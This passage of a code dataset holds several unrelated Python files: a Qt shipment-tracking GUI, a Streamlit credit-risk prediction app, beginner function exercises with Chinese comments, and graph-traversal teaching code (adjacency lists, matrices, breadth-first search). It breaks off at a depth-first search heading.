self.companiesBox.setMinimumSize(QSize(200, 30))\n self.companiesBox.currentTextChanged.connect(self.airCompanyAWB)\n\n self.horizontalLayout.addWidget(self.companiesBox)\n\n self.pushButton = QPushButton(self)\n self.pushButton.setObjectName(u\"pushButton\")\n self.pushButton.setMinimumSize(QSize(0, 30))\n self.pushButton.setCursor(QCursor(Qt.PointingHandCursor))\n self.pushButton.clicked.connect(self.commit)\n\n self.horizontalLayout.addWidget(self.pushButton)\n\n\n self.verticalLayout.addLayout(self.horizontalLayout)\n\n self.groupBox = QGroupBox(self)\n self.groupBox.setObjectName(u\"groupBox\")\n self.verticalLayout_4 = QVBoxLayout(self.groupBox)\n self.verticalLayout_4.setObjectName(u\"verticalLayout_4\")\n self.verticalLayout_4.setContentsMargins(-1, -1, -1, 0)\n self.verticalLayout_3 = QVBoxLayout()\n self.verticalLayout_3.setObjectName(u\"verticalLayout_3\")\n self.horizontalLayout_3 = QHBoxLayout()\n self.horizontalLayout_3.setObjectName(u\"horizontalLayout_3\")\n self.verticalLayout_11 = QVBoxLayout()\n self.verticalLayout_11.setObjectName(u\"verticalLayout_11\")\n self.typeLab = QLabel(self.groupBox)\n self.typeLab.setObjectName(u\"typeLab\")\n font1 = QFont()\n font1.setPointSize(10)\n font1.setBold(True)\n font1.setWeight(75)\n self.typeLab.setFont(font1)\n self.typeLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_11.addWidget(self.typeLab)\n\n self.typeTextLab = QLabel(self.groupBox)\n self.typeTextLab.setObjectName(u\"typeTextLab\")\n self.typeTextLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_11.addWidget(self.typeTextLab)\n\n\n self.horizontalLayout_3.addLayout(self.verticalLayout_11)\n\n self.verticalLayout_10 = QVBoxLayout()\n self.verticalLayout_10.setObjectName(u\"verticalLayout_10\")\n self.qtyLabe = QLabel(self.groupBox)\n self.qtyLabe.setObjectName(u\"qtyLabe\")\n self.qtyLabe.setFont(font1)\n self.qtyLabe.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_10.addWidget(self.qtyLabe)\n\n self.qtyTextLab = QLabel(self.groupBox)\n self.qtyTextLab.setObjectName(u\"qtyTextLab\")\n self.qtyTextLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_10.addWidget(self.qtyTextLab)\n\n\n self.horizontalLayout_3.addLayout(self.verticalLayout_10)\n\n self.verticalLayout_12 = QVBoxLayout()\n self.verticalLayout_12.setObjectName(u\"verticalLayout_12\")\n self.weightLab = QLabel(self.groupBox)\n 
self.weightLab.setObjectName(u\"weightLab\")\n self.weightLab.setFont(font1)\n self.weightLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_12.addWidget(self.weightLab)\n\n self.weightTextLab = QLabel(self.groupBox)\n self.weightTextLab.setObjectName(u\"weightTextLab\")\n self.weightTextLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_12.addWidget(self.weightTextLab)\n\n\n self.horizontalLayout_3.addLayout(self.verticalLayout_12)\n\n self.verticalLayout_8 = QVBoxLayout()\n self.verticalLayout_8.setObjectName(u\"verticalLayout_8\")\n self.originLab = QLabel(self.groupBox)\n self.originLab.setObjectName(u\"originLab\")\n self.originLab.setFont(font1)\n self.originLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_8.addWidget(self.originLab)\n\n self.originTextLab = QLabel(self.groupBox)\n self.originTextLab.setObjectName(u\"originTextLab\")\n self.originTextLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_8.addWidget(self.originTextLab)\n\n\n self.horizontalLayout_3.addLayout(self.verticalLayout_8)\n\n self.verticalLayout_7 = QVBoxLayout()\n self.verticalLayout_7.setObjectName(u\"verticalLayout_7\")\n self.destinaLab = QLabel(self.groupBox)\n self.destinaLab.setObjectName(u\"destinaLab\")\n self.destinaLab.setFont(font1)\n self.destinaLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_7.addWidget(self.destinaLab)\n\n self.destinaTextLab = QLabel(self.groupBox)\n self.destinaTextLab.setObjectName(u\"destinaTextLab\")\n self.destinaTextLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_7.addWidget(self.destinaTextLab)\n\n\n self.horizontalLayout_3.addLayout(self.verticalLayout_7)\n\n self.horizontalLayout_3.setStretch(0, 1)\n self.horizontalLayout_3.setStretch(1, 1)\n self.horizontalLayout_3.setStretch(2, 1)\n self.horizontalLayout_3.setStretch(3, 2)\n self.horizontalLayout_3.setStretch(4, 2)\n\n self.verticalLayout_3.addLayout(self.horizontalLayout_3)\n\n self.line = QFrame(self.groupBox)\n self.line.setObjectName(u\"line\")\n self.line.setFrameShape(QFrame.HLine)\n self.line.setFrameShadow(QFrame.Sunken)\n\n self.verticalLayout_3.addWidget(self.line)\n\n self.horizontalLayout_5 = QHBoxLayout()\n self.horizontalLayout_5.setObjectName(u\"horizontalLayout_5\")\n self.verticalLayout_14 = QVBoxLayout()\n self.verticalLayout_14.setObjectName(u\"verticalLayout_14\")\n self.PODLab = QLabel(self.groupBox)\n self.PODLab.setObjectName(u\"PODLab\")\n font2 = QFont()\n font2.setBold(True)\n font2.setWeight(75)\n self.PODLab.setFont(font2)\n\n self.verticalLayout_14.addWidget(self.PODLab)\n\n self.PODTextLab = QLabel(self.groupBox)\n self.PODTextLab.setObjectName(u\"PODTextLab\")\n\n self.verticalLayout_14.addWidget(self.PODTextLab)\n\n\n self.horizontalLayout_5.addLayout(self.verticalLayout_14)\n\n self.verticalLayout_13 = QVBoxLayout()\n self.verticalLayout_13.setObjectName(u\"verticalLayout_13\")\n self.POALab = QLabel(self.groupBox)\n self.POALab.setObjectName(u\"POALab\")\n self.POALab.setFont(font2)\n\n self.verticalLayout_13.addWidget(self.POALab)\n\n self.POATextLab = QLabel(self.groupBox)\n self.POATextLab.setObjectName(u\"POATextLab\")\n\n self.verticalLayout_13.addWidget(self.POATextLab)\n\n\n self.horizontalLayout_5.addLayout(self.verticalLayout_13)\n\n self.verticalLayout_15 = QVBoxLayout()\n self.verticalLayout_15.setObjectName(u\"verticalLayout_15\")\n self.ship_Flight_Lab = QLabel(self.groupBox)\n self.ship_Flight_Lab.setObjectName(u\"ship_Flight_Lab\")\n self.ship_Flight_Lab.setFont(font2)\n\n 
self.verticalLayout_15.addWidget(self.ship_Flight_Lab)\n\n self.ship_Flight_Text_Lab = QLabel(self.groupBox)\n self.ship_Flight_Text_Lab.setObjectName(u\"ship_Flight_Text_Lab\")\n\n self.verticalLayout_15.addWidget(self.ship_Flight_Text_Lab)\n\n\n self.horizontalLayout_5.addLayout(self.verticalLayout_15)\n\n\n self.verticalLayout_3.addLayout(self.horizontalLayout_5)\n\n\n self.verticalLayout_4.addLayout(self.verticalLayout_3)\n\n self.line_2 = QFrame(self.groupBox)\n self.line_2.setObjectName(u\"line_2\")\n self.line_2.setFrameShape(QFrame.HLine)\n self.line_2.setFrameShadow(QFrame.Sunken)\n\n self.verticalLayout_4.addWidget(self.line_2)\n\n self.horizontalLayout_6 = QHBoxLayout()\n self.horizontalLayout_6.setObjectName(u\"horizontalLayout_6\")\n self.verticalLayout_18 = QVBoxLayout()\n self.verticalLayout_18.setObjectName(u\"verticalLayout_18\")\n self.ATDLabe = QLabel(self.groupBox)\n self.ATDLabe.setObjectName(u\"ATDLabe\")\n self.ATDLabe.setFont(font1)\n self.ATDLabe.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_18.addWidget(self.ATDLabe)\n\n self.ATDTextLab = QLabel(self.groupBox)\n self.ATDTextLab.setObjectName(u\"ATDTextLab\")\n self.ATDTextLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_18.addWidget(self.ATDTextLab)\n\n\n self.horizontalLayout_6.addLayout(self.verticalLayout_18)\n\n self.verticalLayout_17 = QVBoxLayout()\n self.verticalLayout_17.setObjectName(u\"verticalLayout_17\")\n self.ETALab = QLabel(self.groupBox)\n self.ETALab.setObjectName(u\"ETALab\")\n self.ETALab.setFont(font1)\n self.ETALab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_17.addWidget(self.ETALab)\n\n self.ETATextLab = QLabel(self.groupBox)\n self.ETATextLab.setObjectName(u\"ETATextLab\")\n self.ETATextLab.setAlignment(Qt.AlignCenter)\n\n self.ctn = QComboBox(self.groupBox)\n \n self.verticalLayout_17.addWidget(self.ETATextLab)\n\n\n self.horizontalLayout_6.addLayout(self.verticalLayout_17)\n\n self.verticalLayout_16 = QVBoxLayout()\n self.verticalLayout_16.setObjectName(u\"verticalLayout_16\")\n self.ATALab = QLabel(self.groupBox)\n self.ATALab.setObjectName(u\"ATALab\")\n self.ATALab.setFont(font1)\n self.ATALab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_16.addWidget(self.ATALab)\n\n self.ATATextLab = QLabel(self.groupBox)\n self.ATATextLab.setObjectName(u\"ATATextLab\")\n self.ATATextLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_16.addWidget(self.ATATextLab)\n\n\n self.horizontalLayout_6.addLayout(self.verticalLayout_16)\n\n self.verticalLayout_19 = QVBoxLayout()\n self.verticalLayout_19.setObjectName(u\"verticalLayout_19\")\n self.CurrentPLab = QLabel(self.groupBox)\n self.CurrentPLab.setObjectName(u\"CurrentPLab\")\n self.CurrentPLab.setFont(font1)\n self.CurrentPLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_19.addWidget(self.CurrentPLab)\n\n self.currentPTextLab = QLabel(self.groupBox)\n self.currentPTextLab.setObjectName(u\"currentPTextLab\")\n self.currentPTextLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_19.addWidget(self.currentPTextLab)\n\n\n self.horizontalLayout_6.addLayout(self.verticalLayout_19)\n\n\n self.verticalLayout_4.addLayout(self.horizontalLayout_6)\n\n self.verticalSpacer_2 = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding)\n\n self.verticalLayout_4.addItem(self.verticalSpacer_2)\n\n self.horizontalLayout_7 = QHBoxLayout()\n self.horizontalLayout_7.setObjectName(u\"horizontalLayout_7\")\n self.horizontalSpacer = QSpacerItem(40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)\n 
self.horizontalLayout_7.addWidget(self.ctn)\n \n self.horizontalLayout_7.addItem(self.horizontalSpacer)\n\n self.moreButton = QPushButton(self.groupBox)\n self.moreButton.setObjectName(u\"moreButton\")\n self.moreButton.setCursor(QCursor(Qt.PointingHandCursor))\n\n self.horizontalLayout_7.addWidget(self.moreButton)\n self.horizontalLayout_7.setStretch(0,2)\n self.horizontalLayout_7.setStretch(1,1)\n self.horizontalLayout_7.setStretch(2,1)\n\n self.verticalLayout_4.addLayout(self.horizontalLayout_7)\n\n self.verticalLayout_4.setStretch(0, 1)\n self.verticalLayout_4.setStretch(1, 1)\n self.verticalLayout_4.setStretch(4, 1)\n\n self.verticalLayout.addWidget(self.groupBox)\n\n self.horizontalLayout_8 = QHBoxLayout()\n self.horizontalLayout_8.setObjectName(u\"horizontalLayout_8\")\n self.exportPDF = QPushButton(self)\n self.exportPDF.setObjectName(u\"exportPDF\")\n self.exportPDF.setCursor(QCursor(Qt.PointingHandCursor))\n\n self.horizontalLayout_8.addWidget(self.exportPDF)\n\n self.printButton = QPushButton(self)\n self.printButton.setObjectName(u\"printButton\")\n self.printButton.setCursor(QCursor(Qt.PointingHandCursor))\n\n self.horizontalLayout_8.addWidget(self.printButton)\n\n self.trackFlight = QPushButton(self)\n self.trackFlight.setObjectName(u\"trackFlight\")\n self.trackFlight.setCursor(QCursor(Qt.PointingHandCursor))\n\n self.horizontalLayout_8.addWidget(self.trackFlight)\n\n\n self.verticalLayout.addLayout(self.horizontalLayout_8)\n\n self.verticalLayout.setStretch(2, 3)\n\n self.verticalLayout_2.addLayout(self.verticalLayout)\n self.AWB_list = \"\"\n\n\n self.retranslateUi()\n\n self.typeShipment.setCurrentIndex(0)\n \n def textChamps(self):\n self.AWB_list = self.trackingNumberLine.text()\n if self.AWB_list[:3] == '071':\n self.typeShipment.setCurrentText('Air')\n self.companiesBox.setCurrentText('Ethiopian')\n if self.AWB_list[:3] == '057':\n self.typeShipment.setCurrentText('Air')\n self.companiesBox.setCurrentText('Air France')\n if self.AWB_list[:3] == '235':\n self.typeShipment.setCurrentText('Air')\n self.companiesBox.setCurrentText('Turkish Airlines')\n if self.AWB_list[:3] == '406':\n self.typeShipment.setCurrentText('Air')\n self.companiesBox.setCurrentText('UPS Air Cargo')\n if self.AWB_list[:3] == '423':\n self.typeShipment.setCurrentText('Air')\n self.companiesBox.setCurrentText('DHL')\n if self.AWB_list[:3] == '023':\n self.typeShipment.setCurrentText('Air')\n self.companiesBox.setCurrentText('FedEx')\n if self.AWB_list[:3] == '077':\n self.typeShipment.setCurrentText('Air')\n self.companiesBox.setCurrentText('EgyptAir')\n if self.AWB_list[:3] == '125':\n self.typeShipment.setCurrentText('Air')\n self.companiesBox.setCurrentText('British Airways')\n def AircompanyTextCombo(self):\n self.companiesBox.clear()\n if self.typeShipment.currentText() == \"Air\":\n self.companiesBox.addItems(sorted(self.airCompanyList,reverse=False))\n elif self.typeShipment.currentText() == \"Sea\":\n self.companiesBox.addItems(sorted(self.seaCompanyList, reverse=False))\n def airCompanyAWB(self):\n if self.companiesBox.currentText() == \"Air France\":\n air[\"Air France\"] = self.trackingNumberLine.text()\n if self.companiesBox.currentText() == \"Air Royal\":\n air['Air Royal'] = self.trackingNumberLine.text()\n if self.companiesBox.currentText() == \"DHL\":\n air['DHL'] = self.trackingNumberLine.text()\n if self.companiesBox.currentText() == \"FedEx\":\n air['FedEx'] = self.trackingNumberLine.text()\n if self.companiesBox.currentText() == 'Ethiopian':\n air['Ethiopian'] = 
self.trackingNumberLine.text()\n        if self.companiesBox.currentText() == \"Turkish Airlines\":\n            air['Turkish Airlines'] = self.trackingNumberLine.text()\n        if self.companiesBox.currentText() == 'UPS Air Cargo':\n            air['UPS Air Cargo'] = self.trackingNumberLine.text()\n        if self.companiesBox.currentText() == 'EgyptAir':\n            air['EgyptAir'] = self.trackingNumberLine.text()\n        if self.companiesBox.currentText() == 'British Airways':\n            air['British Airways'] = self.trackingNumberLine.text()\n    def commit(self):\n        if self.typeShipment.currentText() == 'Air':\n            self.typeTextLab.setText(\"Pieces\")\n            if self.companiesBox.currentText() == \"Ethiopian\":\n                airCargoTrack.ethiopian(air['Ethiopian'])\n                result = airCargoTrack.ethiopian.resultFonction()  # query the tracker once and reuse the result for every field\n                self.originTextLab.setText(result[0])\n                self.destinaTextLab.setText(result[1])\n                self.qtyTextLab.setText(result[4])\n                self.weightTextLab.setText(result[5])\n                self.currentPTextLab.setText(result[6])\n                self.ship_Flight_Text_Lab.setText(result[2])\n                if result[-1]:\n                    self.ATATextLab.setText(result[3])\n                else:\n                    self.ETATextLab.setText(result[3])\n        if self.companiesBox.currentText() == \"Mediterranean Shipping Company (MSC)\":\n            seaCargoTrack.msc(self.trackingNumberLine.text())\n            info = seaCargoTrack.msc.getGeneralInfo()  # query once\n            self.originTextLab.setText(info[0])\n            self.destinaTextLab.setText(info[1])\n\n    # setupUi\n\n    def retranslateUi(self):\n        self.setWindowTitle(QCoreApplication.translate(\"self\", u\"self\", None))\n        self.title.setText(QCoreApplication.translate(\"self\", u\"SHIPMENTS TRACKING\", None))\n        self.searchIco.setText(\"\")\n        self.trackingNumberLine.setPlaceholderText(QCoreApplication.translate(\"self\", u\"Tracking Number here\", None))\n        self.typeShipment.setItemText(0, QCoreApplication.translate(\"self\", u\"Select a mode...\", None))\n        self.typeShipment.setItemText(1, QCoreApplication.translate(\"self\", u\"Air\", None))\n        self.typeShipment.setItemText(2, QCoreApplication.translate(\"self\", u\"Sea\", None))\n\n        self.typeShipment.setPlaceholderText(QCoreApplication.translate(\"self\", u\"Select a mode...\", None))\n        self.pushButton.setText(QCoreApplication.translate(\"self\", u\"Commit\", None))\n        self.groupBox.setTitle(QCoreApplication.translate(\"self\", u\"Result\", None))\n        self.typeLab.setText(QCoreApplication.translate(\"self\", u\"TYPE\", None))\n        self.typeTextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n        self.qtyLabe.setText(QCoreApplication.translate(\"self\", u\"QTY\", None))\n        self.qtyTextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n        self.weightLab.setText(QCoreApplication.translate(\"self\", u\"Weight\", None))\n        self.weightTextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n        self.originLab.setText(QCoreApplication.translate(\"self\", u\"Origin\", None))\n        self.originTextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n        self.destinaLab.setText(QCoreApplication.translate(\"self\", u\"Destination\", None))\n        self.destinaTextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n        self.PODLab.setText(QCoreApplication.translate(\"self\", u\"Port of Departure\", None))\n        self.PODTextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n        
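A minimal sketch of the same AWB-prefix dispatch as a lookup table; the three-digit prefixes and carrier names are taken verbatim from the textChamps handler above, and detect_carrier is a hypothetical helper, not part of the original file:

AWB_PREFIXES = {
    '071': 'Ethiopian', '057': 'Air France', '235': 'Turkish Airlines',
    '406': 'UPS Air Cargo', '423': 'DHL', '023': 'FedEx',
    '077': 'EgyptAir', '125': 'British Airways',
}

def detect_carrier(awb):
    # returns None for an unknown or too-short tracking number
    return AWB_PREFIXES.get(awb[:3])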
self.POALab.setText(QCoreApplication.translate(\"self\", u\"Port of Arrival\", None))\n self.POATextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n self.ship_Flight_Lab.setText(QCoreApplication.translate(\"self\", u\"Ship / Flight\", None))\n self.ship_Flight_Text_Lab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n self.ATDLabe.setText(QCoreApplication.translate(\"self\", u\"ATD\", None))\n self.ATDTextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n self.ETALab.setText(QCoreApplication.translate(\"self\", u\"ETA\", None))\n self.ETATextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n self.ATALab.setText(QCoreApplication.translate(\"self\", u\"ATA\", None))\n self.ATATextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n self.CurrentPLab.setText(QCoreApplication.translate(\"self\", u\"Current Position\", None))\n self.currentPTextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n self.moreButton.setText(QCoreApplication.translate(\"self\", u\"More\", None))\n self.exportPDF.setText(QCoreApplication.translate(\"self\", u\"Export PDF\", None))\n self.printButton.setText(QCoreApplication.translate(\"self\", u\"Print\", None))\n self.trackFlight.setText(QCoreApplication.translate(\"self\", u\"Track Ship/Flight\", None))\n # retranslateUi\n\nclass mainWin(QMainWindow):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Shipments Tracking\")\n self.resize(675,423)\n ico = QIcon(\"img/icon.png\")\n self.setWindowIcon(ico)\n self.setCentralWidget(Ui_self())\n self.show()\n\nif __name__ == \"__main__\":\n App = QApplication(sys.argv)\n win = mainWin()\n sys.exit(App.exec())","repo_name":"hashtag91/SeaShipmentTracker","sub_path":"SST_Gui.py","file_name":"SST_Gui.py","file_ext":"py","file_size_in_byte":23551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"18601142295","text":"import streamlit as st\nimport joblib\nfrom datetime import date, timedelta\nfrom sklearn.preprocessing import LabelEncoder\n\n# Load the saved model\nmodel = joblib.load('deployment/credit_risk_model.pkl')\n\n# Create the Streamlit app\ndef main():\n # Set page configuration\n st.set_page_config(page_title='Credit Risk Model Deployment', layout='wide')\n\n # Add custom CSS styles\n st.markdown(\n \"\"\"\n \n \"\"\",\n unsafe_allow_html=True\n )\n\n st.title('Credit Risk Model Deployment')\n st.write('Enter the required features below:')\n\n # Create input fields for the required features\n birthdate = st.number_input('Age', min_value=18, max_value=100, step=1)\n latitude_gps = st.number_input('Latitude GPS')\n longitude_gps = st.number_input('Longitude GPS')\n bank_name_clients = st.text_input('Name of the bank', \"GT Bank\", key = \"placeholder\")\n loannumber = st.number_input('The number of the loan that you have to predict')\n creation_day = st.number_input('Day that loan application is created (1-31)', min_value=1, max_value=31)\n approved_day = st.number_input('Day that loan is approved (1-31))', min_value=1, max_value=31)\n creation_dayofweek = st.number_input('Creation weekday (1-7)', min_value=1, max_value=7)\n approved_dayofweek = st.number_input('Approved weekday (1-7)', min_value=1, max_value=7)\n totaldue = st.number_input('Total repayment required to settle the loan', min_value=20.0, value=20.0, format='%f')\n\n # ... 
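One caveat for the Predict handler that follows: fitting a fresh LabelEncoder on the single value typed at inference time always encodes it as 0, whatever the bank. A hedged sketch of the usual fix is to persist the encoder fitted during training and reload it here (the bank_encoder.pkl path is hypothetical):

# dumped at training time with: joblib.dump(label_encoder, 'deployment/bank_encoder.pkl')
bank_encoder = joblib.load('deployment/bank_encoder.pkl')  # hypothetical artifact path
bank_name_clients_encoded = bank_encoder.transform([bank_name_clients])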
add more input fields for other features\n\n # Create a button to make predictions\n if st.button('Predict'):\n # Encode categorical features\n label_encoder = LabelEncoder()\n bank_name_clients_encoded = label_encoder.fit_transform([bank_name_clients])\n\n # Create a data sample with the user inputs\n sample = [[birthdate, latitude_gps, longitude_gps, bank_name_clients_encoded[0],\n loannumber, creation_day, approved_day, creation_dayofweek,\n approved_dayofweek, totaldue]]\n\n # Make predictions using the loaded model\n prediction = model.predict(sample)\n\n # Determine the loan status and corresponding CSS class for styling\n if prediction == 1:\n loan_status = 'Approved'\n status_class = 'approved'\n else:\n loan_status = 'Rejected'\n status_class = 'rejected'\n\n # Display the loan status with appropriate styling\n st.markdown(f'
    <div class=\"{status_class}\">{loan_status}</div>
    ', unsafe_allow_html=True)\n\n# Run the Streamlit app\nif __name__ == '__main__':\n    main()\n","repo_name":"gbganalyst/credit-risk-prediction","sub_path":"deployment/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"5034587154","text":"def my_abs(x):\n    if x >= 0:\n        return x\n    else:\n        return -x\n    # In Python, a function is defined with the def statement: write the function name, parentheses, the parameters inside them, and a colon,\n    # then write the function body in the indented block; the function's return value is given by the return statement.\n# Returning multiple values\n\n# Can a function return multiple values? The answer is yes.\n\n# For example, games often need to move from one point to another: given the coordinates, a displacement and an angle, the new coordinates can be computed:\n\nimport math\n\ndef move(x, y, step, angle=0):\n    nx = x + step * math.cos(angle)\n    ny = y - step * math.sin(angle)\n    return nx, ny\n# The import math statement imports the math package and lets the following code use sin, cos and the other functions it contains.\n\n\n\n# Define a function quadratic(a, b, c) that takes 3 parameters and returns the two\n\n# solutions of the quadratic equation ax^2 + bx + c = 0. Hint: math.sqrt() computes the square root:\n# -*- coding: utf-8 -*-\nimport math\n\ndef quadratic(a, b, c):\n    d = b*b-4*a*c\n    if d < 0:\n        return 'no real solutions'\n    else:\n        x1=(math.sqrt(d)-b) / (2*a)\n        x2=(-math.sqrt(d)-b) / (2*a)\n        return x1,x2\nprint('quadratic(2, 3, 1) =', quadratic(2, 3, 1))\nprint('quadratic(2, 4, 2) =', quadratic(2, 4, 2))\nprint('quadratic(3, 4, 2) =', quadratic(3, 4, 2))\n\n","repo_name":"kuangtao94/TestHome","sub_path":"jiayukejian/Case/定义函数.py","file_name":"定义函数.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"33987412299","text":"\"\"\"\nlets represent the nodes and edges in the graphs\nnodes are the points and edges are the connection between the points\nfor ref we can create nodes and edges using this image https://i.imgur.com/xkgMnwx.png\n\"\"\"\n\nprint(\"\\n---------------Adjacency List - Print a simple graph with node and edges--------------\\n\")\n\nnum_nodes = 5\nedges = [(0,1), (0,4), (1,2), (1,3), (1,4), (2,3),(3,4)]\n\nclass Graph:\n    def __init__(self, num_nodes):\n        self.num_nodes = num_nodes\n        # create list of empty list \n        self.list_of_nodes = [[] for _ in range(num_nodes)]\n    \n    def add_edge(self, node_a, node_b):\n        self.list_of_nodes[node_a].append(node_b)\n        self.list_of_nodes[node_b].append(node_a)\n    \n    def remove_edge(self, edge):\n        # remove both directions of the undirected edge\n        node_a, node_b = edge\n        if node_b in self.list_of_nodes[node_a]:\n            self.list_of_nodes[node_a].remove(node_b)\n            self.list_of_nodes[node_b].remove(node_a)\n    \n    # lets print the graph in a better way\n    def display_graph(self):\n        print(\n            \"\\n\".join(\n                [\"Node {}: Edge connected with {}\".format(\n                    node, neighbour) \n                    for node, neighbour in enumerate(\n                        self.list_of_nodes)])\n        )\n# end of Graph class\n\nnew_graph = Graph(num_nodes)\nfor edge_a, edge_b in edges:\n    new_graph.add_edge(edge_a, edge_b)\nnew_graph.display_graph()\nnew_graph.remove_edge((1,4))\nprint()\nnew_graph.display_graph()\n\nprint(\"\\n---------------Adjacency Matrix represent the nodes as 1-0 in the matrix--------------\\n\")\n\nclass GraphMatrix:\n    def __init__(self, num_nodes):\n        self.num_nodes = num_nodes\n        # create list of empty list \n        self.adj_matrix = [[0 for _ in range(num_nodes)] for _ in range(num_nodes)]\n    \n    def add_edge(self, node_a, node_b):\n        if node_a == node_b:\n            print(\"Same Node %d and %d\" % (node_a, node_b))\n        # insert in the correct adj_matrix\n        self.adj_matrix[node_a][node_b] = 1\n        self.adj_matrix[node_b][node_a] = 1\n    \n    def remove_edge(self, node_a,node_b):\n        if self.adj_matrix[node_a][node_b] == 0:\n            print(\"No edge between %d and %d\" % (node_a, node_b))\n            return\n        self.adj_matrix[node_a][node_b] = 0\n        
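A quick sanity check for the adjacency-list remove_edge above, as a minimal sketch on a tiny three-node graph:

g = Graph(3)
g.add_edge(0, 1)
g.add_edge(1, 2)
g.remove_edge((0, 1))
assert g.list_of_nodes == [[], [2], [1]]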
self.adj_matrix[node_b][node_a] = 0\n\n # lets print the graph in a better way\n def display_graph_matrix(self):\n print('{}'.format(self.adj_matrix)) \n# end of GraphMatrix class \n\nnew_graph_matrix = GraphMatrix(num_nodes)\nfor edge_a, edge_b in edges:\n new_graph_matrix.add_edge(edge_a, edge_b)\nnew_graph_matrix.display_graph_matrix()\nnew_graph_matrix.remove_edge(1,4)\nprint()\nnew_graph_matrix.display_graph_matrix()\n\nprint(\"\\n---------------Graph traversal - breadth-first search--------------\\n\")\n\"\"\"\nBFS pseudocode:\n\n 1 procedure BFS(G, root) is\n 2 let Q be a queue\n 3 label root as discovered\n 4 Q.enqueue(root)\n 5 while Q is not empty do\n 6 v := Q.dequeue()\n 9 for all edges from v to w in G.adjacentEdges(v) do\n10 if w is not labeled as discovered then\n11 label w as discovered\n12 Q.enqueue(w)\n\"\"\"\n\ndef breadth_first_search(graph, root):\n queue = []\n data = graph.list_of_nodes\n discovered = [False] * len(data)\n distance = [None] * len(data)\n parent = [None] * len(data)\n\n discovered[root] = True\n distance[root] = 0\n queue.append(root)\n connected = True\n # to dequeue the list we will have an index which will track the first \n # element in the queues list\n idx = 0\n\n while idx < len(queue):\n # get most recently inserted element in the queue, dequeue operation\n current = queue[idx]\n # as we got the current/discovered value in the queue increment the index\n idx += 1 \n # check all the edges of the current node\n # for example the root/current is 0 then data[current] will be [1,4] \n for node in data[current]:\n # yet to discover, so here 0 is discovered but not 1 (node) from [1,4]\n if not discovered[node]:\n # current nodes distance is 1 + self\n distance[node] = 1 + distance[current]\n # Parent node will be current as it is not discovered yet\n parent[node] = current\n # so we can set the note as discovered \n discovered[node] = True\n # and append the node in queue\n queue.append(node)\n \n # check if the graph is connected or not\n if len(queue) < len(data):\n connected = False\n\n return queue, distance, parent, connected\n# end of breadth_first_search()\n\n# uncomment to test the all nodes connected scenario \n# num_nodes = 9\n# edges = [(0, 1), (0, 3), (1, 2), (2, 3), (4, 5), (4, 6), (5, 6), (7, 8)]\nnew_graph = Graph(num_nodes)\nfor edge_a, edge_b in edges:\n new_graph.add_edge(edge_a, edge_b)\nnew_graph.display_graph()\n\nroot = 3\nedges, distance, parent, connected = breadth_first_search(new_graph, root)\nprint(f\"\\nThe {root} has {edges} nodes associated, \\\ndistance (order of nodes) is {distance} and \\\nthe parent (order of nodes) is {parent}. Is the graph connected? 
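The parent array returned by breadth_first_search above is enough to recover an actual shortest path; a hypothetical helper, not part of the original file:

def path_from_parents(parent, target):
    # walk back from the target to the BFS root, then reverse
    path = [target]
    while parent[path[-1]] is not None:
        path.append(parent[path[-1]])
    return path[::-1]  # root ... target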
{connected}.\")\n\nprint(\"\\n--Get the componentes which are connected in a graph--\\n\")\n\ndef is_component_util(graph, node, discovered, connected_graph_edge):\n # If the node/neighbour is not discovered mark it discovered \n discovered[node] = True\n # append the node/neighbour in the list\n connected_graph_edge.append(node)\n # if node = 0 so in a graph like [[0,1],[1,2], [3]], the graph[node]=[0,1] \n # so value of neighbour will be 0 then 1 then 1 then 2 \n for neighbour in graph[node]: \n # only discover if the neighbour is not discovered\n if not discovered[neighbour]: \n is_component_util(graph, neighbour, discovered, connected_graph_edge)\n\ndef bfs_component_connected(graph, num_nodes):\n discovered = [False] * num_nodes\n components = []\n\n # iterate over the range of num_nudes\n for node in range(num_nodes):\n if not discovered[node]:\n connected_graph_edge = []\n is_component_util(graph, node, discovered, connected_graph_edge)\n # here the list of connected nodes will be appended\n components.append(connected_graph_edge)\n \n return components\n# end of bfs_component_connected\n\nresult = bfs_component_connected(new_graph.list_of_nodes, num_nodes)\nprint(\"List of connected components in graph:\", result)\n\n\nprint(\"\\n---------------Graph traversal - depth-first search--------------\\n\")\n\"\"\"\nQuestion: Define a class to represent weighted and directed graphs in 